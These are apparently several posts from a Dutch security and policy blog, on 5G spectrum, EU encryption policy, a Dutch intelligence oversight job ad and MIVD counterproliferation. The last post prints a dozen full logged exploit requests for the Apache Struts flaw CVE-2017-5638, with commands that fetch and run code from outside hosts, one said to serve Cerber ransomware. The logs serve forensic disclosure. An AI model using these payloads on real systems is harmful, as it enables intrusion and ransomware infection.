The National Frequency Plan prescribes that until 2026, only the intelligence services are permitted to use the 3.5GHz band on territory north to the Amsterdam-Zwolle axis. Licenses can be issued for territory south to that axis, but only under such restrictions that it is doubtful telecom parties will be interested, says 5G expert Toon Norp of TNO Research. Norp: ‘The discussion about the use of the 3.5GHz band has reached a deadlock. Both the MoD and telecom providers have legitimate interests.’

5G for cars

5G is the next generation of mobile data communication technology. Its bandwidths are 3-10x that of 4G, connections are established 20x faster (lower latency) and a million devices per square kilometer should be able to connect. 5G should realize the internet of things. The low latency is important for communication between self-driving cars. For smartphones, 5G is not a necessity, although the high connection/device density is an advantage. Dutch telecom provider KPN states: ‘4G connects people, 5G connects society’.

Whether 5G will indeed arrive at a large scale is uncertain. GSMA expects the share of 5G connections in the global data communications to grow from 2% in 2020 to 12% in 2025. More than half of the 750 telecom operator chiefs interviewed by the GSMA mentioned ‘lack of a clear business case’ as biggest threat to 5G. The required investments are estimated at 150 billion euro globally on an annual basis. This is largely due to the fine-grained network of antennas that is required to achieve high throughput and low latency.

According to the standard, 5G will use three bands: 700MHz, 3.5GHz, and 26GHz. The 700MHz band, which has the longest waves, does not offer high throughput and is mostly useful to help support a nation-wide network. The 26GHz millimeter band has very high throughput, but due to its short waves has a short range and can only be used for the last couple of hundred meters of a mobile connection. The 3.5GHz band combines the best of both: high throughput and good range. It is the presumed backbone of 5G, but is reserved for use by the MIVD.

Action plan

Next year, part of the 700MHz band for 5G will be auctioned off, but according to Norp, that provides little solace. ‘It is merely a very short band that is auctioned, just 30MHz wide. At most three operators can participate there, while the 3.5GHz band has hundreds of MHz of room.’

Norp expects that 5G networks on the 3.5 GHz band can largely be deployed via existing 3G/4G antenna locations. But simply using the 3G and 4G bands for 5G is not an option for the near future, because equipment manufacturers will first make their 5G equipment work with the internationally agreed bands. Notably the 3.5GHz band.

State secretary Mona Keijzer (Economic Affairs) announced she will present directions for solutions to end the deadlock, and that she will elaborate on those in her Digital Connectivity Action Plan. Norp hopes a creative solution will be found to allow telecom provides and the MoD to share the 3.5GHz band. At the longer term, the MIVD will no longer be able to control the 3.5GHz band. ‘Because Germany will use the 3.5GHz band for 5G’, according to Norp. Regardless of the Dutch government’s policy, the MIVD will get competition on the 3.5GHz band.

EOF

UPDATE 2020-07-20: Golem.de reports that Europol’s decryption platform involves the use of Hashcat. (Note: which is not surprising — Hashcat is the world’s best software for cracking a very wide variety of hashes via brute-force methods. It’s free & open source. Set up a huge GPU cluster, feed Hashcat with custom dictionaries, have fun. Notably the inclusion of non-typical character sets — Cyrillic? big5 aka Chinese? — and words/dictionaries pertaining to the realms that the inputs (e.g. user-supplied passwords) originate from may impact ‘performance and necessitate more computational resources than, say, a typical pentesting company might employ when using Hashcat for non-LE purposes.)

UPDATE 2018-02-15: Five million euro for Europol’s “decryption platform” (blog by Matthias Monroy / @matthimon).

On 18 October 2017, the European Commission (EC) announced an upcoming anti-terrorism package, which addresses, inter alia, encryption challenges in criminal investigations. From the Q&A:

[…]

4. Supporting law enforcement in criminal investigations online

What is the role of encryption in criminal investigations?

Law enforcement and judicial authorities are increasingly facing challenges posed by the use of encryption by criminals in the context of criminal investigations. This is not only limited to serious crimes: in many cases, electronic data may be the only information and evidence available to prosecute and convict criminals. The challenges are not only due to attempts by criminal users to disguise their electronic communication and privately stored data, but also due to the default option of many communication services to apply encryption. The use of encryption by criminals, and therefore its impact on criminal investigations, is expected to continue to grow in the coming years.

How is the Commission proposing to support Member States on encryption?

Following consultation with Member States and stakeholders, the Commission has proposed today:

• to support Europol to further develop its decryption capability;
• to establish a network of centres of encryption expertise;
• to create a toolbox for legal and technical instruments;
• to provide training for law enforcement authorities, supported by €500,000 from the ISF–Police fund in 2018;
• to establish an observatory for legal and technical developments;
• to establish a structured dialogue with industry and civil society organisations.

In early 2018, the Commission will present proposals to provide for a legal framework to facilitate access to electronic evidence.

[…]

It is unclear what this might mean in practice, but Rebecca Hill (Twitter: @BekiHill) reported at El Reg that security commissioner Julian King (Twitter: @JKingEU) said the following:

“The commission’s position is very clear – we are not in favour of so-called backdoors, the utilisation of systemic vulnerabilities, because it weakens the overall security of our cyberspace, which we rely upon.”

Hill (correctly) states:

“How exactly… we don’t know. Maybe someone has an RSA-cracking supercomputer up their sleeve they’re keeping secret. Maybe someone’s particularly good with a soldering iron and can read off keys from extracted flash memory chips.

What we do know is that the thrust of the plan boils down to asking member states to help each other by sharing their knowledge on dealing with encryption and creating a observatory to keep an eye on the latest tricks of the trade.”

On 16 October 2017, two days before the announcement by the EC, Maryant Fernández Pérez (Twitter: @maryantfp) stated the following in a blog post at EDRi:

“Saying ‘no’ to backdoors is a step into the right direction, but not the end of the debate, as there are still many ways to weaken encryption. The answer to security problems like those created by terrorism cannot be the creation of security risks. On the contrary, the EU should focus on stimulating the development and the use of high-grade standards for encryption, and not in any way undermine the development, production or use of high-grade encryption.

We are concerned by the potential inclusion of certain aspects of the Communication, such as the increase of capabilities of Europol and what this may entail, and references to removal of allegedly “terrorist” content without accountability in line with the Commission’s recent Communication on tackling illegal content online. We remain vigilant regarding the developments in the field of counter-terrorism.”

The EC statement that it does not seek backdoors should not be interpreted as meaning that Member States’ intelligence services / communities won’t, individually or in voluntary cooperation with peers or industry, pursue influencing crypto standards for kleptographic objectives (such as NSA did with Dual_EC_DRBG) regardless of EU-level policy. It simply means that the EC does not pursue EU-level policy on that — at this time, anyway.

Cryptanalytic efforts, such as the Edgehill (GCHQ) program, will obviously remain in existence in individual Member States, as they do elsewhere in the world (notably in the U.S.) — and the EC announcement’s Q&A excerpt cited above states the EC will seek to support Europol to further develop its decryption capability.

The EC’s announcement also says they will promote “structured dialogue with industry and civil society organisations”, with unstated objectives. To speculate: objectives might include convincing those engaged in dialogue that strong end-to-end crypto should not be enabled by default, and/or making sure certain information other than message content is still emitted and observable, and/or or otherwise changing software/hardware/protocol design (e.g. hardware backdoors – read for instance this paper) or implementation to suit LE/intel needs. Which includes needs that must, in addition to privacy interests, also be addressed to maintain democratic values. [UPDATE 2017-12-14: something along those lines seems to be happening in the U.S., going by the following statement by FBI director Christopher Wray cited by @emptywheel : “[…] The FBI is actively engaged with relevant stakeholders, including companies providing technological services, to educate them on the corrosive effects of the Going Dark challenge on both public safety and the rule of law, and with the academic community and technologists to work on technical solutions to this problem”.]

To be continued.

Related reading:

• 2018-01-09: FBI chief calls unbreakable encryption ‘urgent public safety issue’ (Reuters). Snippet: “[…] The Federal Bureau of Investigation was unable to access data from nearly 7,800 devices in the fiscal year that ended Sept. 30 with technical tools despite possessing proper legal authority to pry them open, a growing figure that impacts every area of the agency’s work, [FBI director Christopher Wray] said during a speech at a cyber security conference in New York. […]”.
• 2017-10-31: The European Commission struggles to find a position on encryption (EDRi)
• 2017-10-24: U.S: Ron Wyden Is Worried the Government Will Use FISA Process to Force Companies to Make Technical Changes (relevant development in the U.S.; post by investigative journalist @emptywheel)
• 2017-06-17: EU LIBE proposes end-to-end encryption in e-Communications; and, re: Privacy Shield, WP29 seeks, i.a., “precise evidence” from U.S. that bulk collection is “as tailored as feasible”, limited and proportionate (this blog)
• 2016-08-15: EU to crack down on online services such as WhatsApp over privacy (Guardian)
• 2016-01-05: Full translation of the Dutch government’s statement on encryption (this blog)
• 2014-09-15: [Dutch] Platform Interceptie-Decryptie en Signaalanalyse (PIDS) en Platform 13 (this blog)

EOF

Hieronder volgt een selectie van afspraken uit het Regeerakkoord 2017-2021 — Vertrouwen in de toekomst (VVD, CDA, D66 en CU) die betrekking hebben op digitale thema’s, veiligheid en privacy. Een tweet van Liza van Lonkhuyzen (NRC) doet me de volgende van de afspraken even apart uitlichten (vetmarkering is van mij):

“Voor de uitvoering van de Wet Computercriminaliteit III komt 10 miljoen euro extra beschikbaar. Daarbij zal slechts in een specifieke zaak hacksoftware worden ingekocht door opsporingsdiensten. Leveranciers van dergelijke software worden gescreend door de AIVD en verkopen niet aan dubieuze regimes. Statistieken over het gebruik van hacksoftware worden jaarlijks openbaar gemaakt. Bij de evaluatie van de wet na twee jaar wordt bezien in hoeverre deze regeling de effectiviteit van de wet ernstig aantast. In dat geval wordt alsnog de aanschaf van hacksoftware voor algemeen gebruik overwogen.”

De volledige selectie:

EOF

On 4 October 2017 a job advertisement appeared in NRC Handelsblad for a chair person & members of the “Toetsingcommissie Inzet Bevoegdheden” (TIB), the additional oversight committee established per the new Dutch spy law (Wiv20xx) that will perform binding ex-ante oversight on exercise of powers. PrivacyNieuws.nl (@PrivacyNleuws) published a picture (.gif) of the ad, which OCR’s back to the following text (in Dutch; OCR errors corrected):

Toetsingscommissie Inzet Bevoegdheden

In de nieuwe Wet op de inlichtngen- en veiligheidsdiensten 2017 (Wiv 2017) is voorzien in het instellen van een Toetsingscommissie Inzet Bevoegdheden (TIB). Deze commissie is een onafhankelijke commissie belast met met vooraf toetsen van de rechtmatigheid van de door de minister van Binnenlandse Zaken en Koninkrijksrelaties of minister van Defensie gegeven toestemming tot met inzetten van bepaalde bijzondere bevoegdheden door de Algemene inlichtingen- en Veiligheidsdienst (AIVD) respectievelijk de Militaire Inlichtingen- en Veiligheidsdienst (MIVD). Het oordeel van de TIB is bindend. Er is een initiatief voor een raadgevend referendum over de Wiv 2017. De regering en de Tweede Kamer der Staten-Generaal, hoewel zich bewust van dit initiatief, hechten eraan dat reeds thans met de werving wordt begonnen voor:

een voorzitter en leden voor de Toetsingscommissie Inzet Bevoegdheden (m/v)

Functie-eisen
Ten minste twee van de drie leden, onder wie de voorzitter, dienen ten minste zes jaar de functie van rechterlijk ambtenaar met rechtspraak belast, bedoeld in artikel 1, onderdeel c, van de Wet op de rechterlijke organisatie te hebben vervuld, dan wel ten minste zes jaar als lid van de Afdeling bestuursrechtspraak van de Raad van State, als lid belast met rechtspraak bij het College van Beroep voor het bedrijfsleven of als lid belast met rechtspraak bij de Centrale Raad van Beroep werkzaam te zijn geweest. Het derde lid beschikt bij voorkeur over een relevante technische deskundigheid en/of inzicht in veiligheidsrisico’s. Werkervaring als rechter-commissaris in strafzaken strekt tot aanbeveling.

Voor het vervullen van de functie is verder van belang dat de !eden over de Nederlandse nationaliteit beschikken, gezaghebbend zijn en publiekelijk vertrouwen genieten, beschikken over relevante kennis van of ervaring met het terrein van de AIVD en MIVD, alsmede een bewezen vermogen hebben om snel een oordeel te vormen in de complexe afweging van publieke belangen en de bescherming van privebelangen en individuele rechten.

De voorzitter onderhoudt de externe contacten van de TlB met de minister-president, de minister van Binnenlandse Zaken en Koninkrijksrelaties en de minister van Defensie, alsmede de directeur-generaal van de AIVD, de directeur van de MIVD en de voorzitter van de Commissie van Toezicht op de Inlichtingen- en Veiligheidsdiensten. De werkverdeling tussen de voorzitter, de overige !eden en het secretariaat van de TIB wordt nader uitgewerkt en vastgelegd in een Reglement van Orde.

Arbeidsvoorwaarden
Het beoogde tijdstip van aantreden is 1 januari 2018. De benoeming van de voorzitter betreft in principe een benoeming voor 20 uren per week en voor de overige twee !eden een benoeming voor 12 uren per week. Het aantal uren van de betrekking kan worden aangepast indien de werkzaamheden dat vergen. Alle drie de benoemingen gelden voor de termijn van zes jaar. Hierna kan eenmaal herbenoeming plaatsvinden voor een periode van zes jaar. Het salaris van de voorzitter is gelijk aan het maximum van salarisschaal 19 van bijlage A van het Bezoldigingsbesluit Burgerlijke Rijksambtenaren 1984. Het salaris van de leden is gelijk aan het maximum van salarisschaal 17 van bijlage B van het Bezoldigingsbesluit Burgerlijke Rijksambtenaren 1984. Op grond van artikel 100 van de Wiv 2017 kan iemand lid van de TlB zijn tot de leeftijd van zeventig jaren is bereikt.

Wervings- en benoemingsprocedure
De vice-president van de Raad van State, de president van de Hoge Raad der Nederlanden en de Nationale ombudsman stellen gezamenlijk een aanbevelingslijst op van ten minste drie kandidaten per vacature. Voor de benoeming van de voorzitter en !eden van de TIB wordt door de Tweede Kamer der Staten-Generaal per vacature een voordracht van ten minste drie personen gedaan waaruit de betrokken ministers een keuze maken. De functies zijn aangewezen als vertrouwensfuncties. Een veiligheidsonderzoek door de AIVD op A-niveau is dan ook onderdeel van de benoemingsprocedure.

Nadere informatie over de functies kunt u inwinnen bij de plaatsvervangend coördinator voor de inlichtingen- en veiligheidsdiensten, de heer mr. H.C.D. Korvinus, telefoon 070 – 356 41 80.

Uw schriftelijke sollicitatie voorzien van een curriculum vitae kunt u tot uiterlijk 20 oktober 2017 richten aan:

Vice-president Raad van State
Mr. J.RH. Donner
Postbus 20019
2500 EA Den Haag

EOF

UPDATE 2017-10-25: answers (.pdf, in Dutch; mirror) to parliamentary questions on this matter.

NOS reports (in Dutch) on an interview by ANP where the chief of the Dutch Military Intelligence & Security Service (MIVD) warns companies and (knowledge) institutes to be aware of attempts by foreign nations including North Korea, Iran, Pakistan and Syria to acquire materials and knowledge in the Netherlands. Here is my translation of the NOS report:

The Dutch intelligence & security services annually thwarts “a substantial number of attempts” by foreign countries to acquire knowledge and materials for WMDs. That is what Onno Eichelsheim, chief of the Military Intelligence & Security Service (MIVD), states in an interview with the ANP.

Eichelsheim won’t say how frequently it happens. The reason for that is that he does not want to reveal the capabilities of the department that exclusively deals with that. The MIVD chief only notes that the Unit Counterproliferation employs dozens of personnel, and informs the ministry of defense dozens of times annually, for instance with regard to export licenses.

Eichelsheim states that companies and knowledge institutes are little aware that countries such as North Korea, Iran, Pakistan and Syria attempt to acquire knowledge in the Netherlands. The Netherlands is a technologically high-developed country, which those countries are eager to use.

Smaller companies who make products such as ball bearings or heat-resistant materials must also be alert, Eichelsheim says.

Countries that are seeking high-grade materials always use covers, such as a company or a middle person. Eichelsheim says it is certainly suspicious if a customer is willing to pay a high price for materials or chemicals that can be purchased elsewhere for a fraction of the price. Companies and institutes must be aware that their products can be used in the development of WMDs.

EOF

On 15 September 2017, Equifax stated their compromise happened through exploitation of CVE-2017-5638, a vulnerability in Apache Struts — published in March 2017 after being exploited in the wild — that involves a crafted Content-Type HTTP request header. For those interested, here are log rules of 28 (untargeted) requests that attempted to exploit this vulnerability on my own blog (which does not run Apache Struts) between 10 March 2017 and 14 September 2017.

The lines are quite long; scroll to right in the grey dialog below. Each line contains a single “#cmd=” that defines a command and a single “#cmds=” (I highlighted those parts in bold below) that feeds the command to cmd.exe on Windows systems and /bin/bash on non-Windows systems. 12 of 28 cases attempt to download & run code; the remaining 16 cases only execute echo “Struts2045” or echo “Amen4Wolves” and seem to be probes for vulnerability. In (only) one case the payload could still be accessed: hxxp://82.165.129.119/UnInstall.exe, which contains Cerber ransomware. So, this was an attempt to distribute ransomware by exploiting CVE-2017-5638; the source was 220.191.231.222, registered to ‘Jinhua Electronic Government Network’.

blog.cyberwar.nl-forensic.log:+25030:58c2e12a:40|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/.jb %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/.jb ; fetch http%3a//65.254.63.20/.jb ; perl .jb ;rm -rf .jb*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+18708:58ce3b02:5f|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/oz %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/oz ; fetch http%3a//65.254.63.20/oz ; perl oz ;rm -rf oz*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+25980:58d00e81:14|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3ahttps://blog2.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+5491:58d2431c:10|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c echo open 82.165.129.119 21 >> ik &echo user anonymous anonymous>> ik &echo binary >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s%3aik &del ik &1.exe &exit').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+5481:58d2431c:21|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/a%7csh ; rm -rf a ; curl -O http%3a//65.254.63.20/a ; sh a ').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+4485:58d2431c:34|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='BITSAdmin.exe /Transfer JOB http%3a//82.165.129.119/UnInstall.exe %25TEMP%25/UnInstall.exe & %25TEMP%25/UnInstall.exe').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+13314:58d45e97:54|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3ahttps://blog2.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+4017:58ebf9b6:46|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3ahttps://blog2.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+14242:58f02f0c:f9|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/oz %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/oz ; fetch http%3a//65.254.63.20/oz ; perl oz ;rm -rf oz*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+16047:58f02f12:9|GET /login/ HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/oz %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/oz ; fetch http%3a//65.254.63.20/oz ; perl oz ;rm -rf oz*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+15024:58f02f14:b2|GET /wp-login.php HTTP/1.1|Accept-Encoding:identity|Host:blog.cyberwar.nl|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/oz %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/oz ; fetch http%3a//65.254.63.20/oz ; perl oz ;rm -rf oz*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+6171:590e8bf2:64|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3ahttps://blog2.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
